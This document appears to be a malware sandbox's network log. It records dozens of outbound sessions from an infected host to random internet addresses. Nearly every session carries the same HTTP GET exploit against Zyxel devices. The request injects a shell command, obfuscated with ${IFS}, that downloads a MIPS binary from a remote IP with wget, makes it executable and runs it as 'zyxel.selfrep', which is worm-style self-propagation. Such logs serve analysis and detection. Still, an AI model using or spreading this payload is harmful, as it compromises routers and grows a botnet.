                                      Jan 14, 2024 15:50:32.974591970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      824192.168.2.143721063.30.181.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974642038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      825192.168.2.1460776210.102.211.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974685907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      826192.168.2.14455869.136.179.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974739075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      827192.168.2.146053448.219.153.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974785089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      828192.168.2.1452440147.28.44.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974832058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      829192.168.2.1438754117.41.181.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974884033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      830192.168.2.1452788212.44.182.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974911928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      831192.168.2.1449624172.55.218.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974952936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      832192.168.2.145103217.153.99.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974983931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      833192.168.2.1449570117.211.47.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975016117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      834192.168.2.146087254.90.190.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975079060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      835192.168.2.144981095.179.87.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975109100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      836192.168.2.145868643.104.126.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975151062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      837192.168.2.145165091.208.169.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975209951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      838192.168.2.1443274218.138.128.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975244045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      839192.168.2.143715427.116.252.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975291014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      840192.168.2.1457342109.78.122.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975337029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      841192.168.2.145478672.68.14.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975374937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      842192.168.2.146034432.131.19.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975416899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      843192.168.2.144854665.27.96.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975455999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      844192.168.2.145498059.146.241.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975481987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      845192.168.2.1460034212.64.212.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975522041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      846192.168.2.1455304123.222.158.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975552082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      847192.168.2.14368709.129.251.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975588083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      848192.168.2.1438288114.166.157.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975637913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      849192.168.2.1448076176.237.181.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975672960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      850192.168.2.1453840109.201.253.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975708008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      851192.168.2.145349286.218.242.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975743055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      852192.168.2.1437454182.155.138.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975806952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      853192.168.2.1454510169.25.225.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975851059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      854192.168.2.143372077.98.238.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975888014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      855192.168.2.1437840118.133.119.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975914955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      856192.168.2.144847094.103.137.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975934982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      857192.168.2.1442410175.6.63.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.975987911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      858192.168.2.1454586105.18.182.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976038933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      859192.168.2.145916623.138.193.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976064920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      860192.168.2.1441790147.116.172.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976130962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      861192.168.2.1443904120.56.136.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976161003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      862192.168.2.1447144133.168.108.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976198912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      863192.168.2.144184068.238.179.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976238012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      864192.168.2.1447010120.188.209.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976309061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      865192.168.2.1443524180.137.14.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976344109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      866192.168.2.1444500170.115.49.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976375103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      867192.168.2.1454532179.162.209.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976398945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      868192.168.2.1452510111.160.155.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976468086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      869192.168.2.1438306157.193.90.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976514101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      870192.168.2.144131895.214.215.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976537943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      871192.168.2.144433677.190.21.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976577044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      872192.168.2.1450548174.220.194.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976612091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      873192.168.2.1433758163.253.252.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976654053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      874192.168.2.1433498136.232.84.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976716995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      875192.168.2.1450190119.114.111.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976735115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      876192.168.2.144140473.193.46.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976763964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      877192.168.2.145739623.189.21.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976814032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      878192.168.2.1446008217.172.87.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976840973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      879192.168.2.143614819.183.181.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976891041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      880192.168.2.1457154169.166.233.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976959944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      881192.168.2.1441954184.175.118.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.976989031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      882192.168.2.1433852182.225.81.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.977056980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      883192.168.2.1452996160.244.26.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.977088928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      884192.168.2.1455262202.66.195.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.977127075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      885192.168.2.1458946216.228.79.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.977175951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      886192.168.2.1449012131.116.125.222443
                                      TimestampBytes transferredDirectionData
